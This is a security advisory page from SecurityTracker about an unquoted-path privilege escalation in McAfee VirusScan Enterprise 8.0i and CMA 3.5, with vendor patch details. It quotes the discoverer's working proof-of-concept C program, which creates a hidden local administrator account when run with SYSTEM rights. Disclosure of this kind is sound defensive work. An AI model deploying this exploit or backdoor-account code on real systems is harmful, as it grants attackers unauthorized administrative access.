SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   McAfee VirusScan Vendors:   McAfee
McAfee VirusScan Bug in 'naPrdMgr.exe' Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1015404
SecurityTracker URL:  http://securitytracker.com/id/1015404
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 23 2005
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Enterprise Version 8.0i Patch 11
Description:   A vulnerability was reported in McAfee VirusScan. A local user can gain elevated privileges on the target system.

The 'naPrdMgr.exe' process invokes a particular binary application (EntVUtil.EXE) in an unsafe manner. A local user can create a specially named file containing arbitrary code. When McAfee VirusScan attempts to invoke the application, the specially named file will be invoked instead and the arbitrary code will be executed with Local System privileges.

The software attempts to run the 'C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE' file but instead will attempt to run 'C:\Program.exe' or 'C:\Program Files\Network.exe' first.

McAfee Common Management Agent 3.5 Patch 5 is also affected.

Reed Arvin discovered this vulnerability.

The original advisory is available at:

http://reedarvin.thearvins.com/20051222-01.html

Impact:   A local user can gain Local System privileges on the target system.
Solution:   The vendor has issued a fixed version (Patch 12).

The vendor's knowledge base article (kb45256) is available at:

http://knowledgemap.nai.com/KanisaSupportSite/search.do?cmd=displayKC&externalId=KBkb45256xml

Vendor URL:  www.mcafee.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

( Original article: http://reedarvin.thearvins.com/20051222-01.html )

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA  3.5 (patch 5) (http://www.mcafee.com/)

Details:
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file.
Because of a lack of quotes the  naPrdMgr.exe process first tries to
run C:\Program.exe. If that is not found it tries to run C:\Program
Files\Network.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named  Program.exe and place it on the
root of the C:\ and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
below.

Vulnerable Versions:
McAfee VirusScan Enterprise  8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."

Exploits:

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

     GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program 
Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup
Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/ )

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC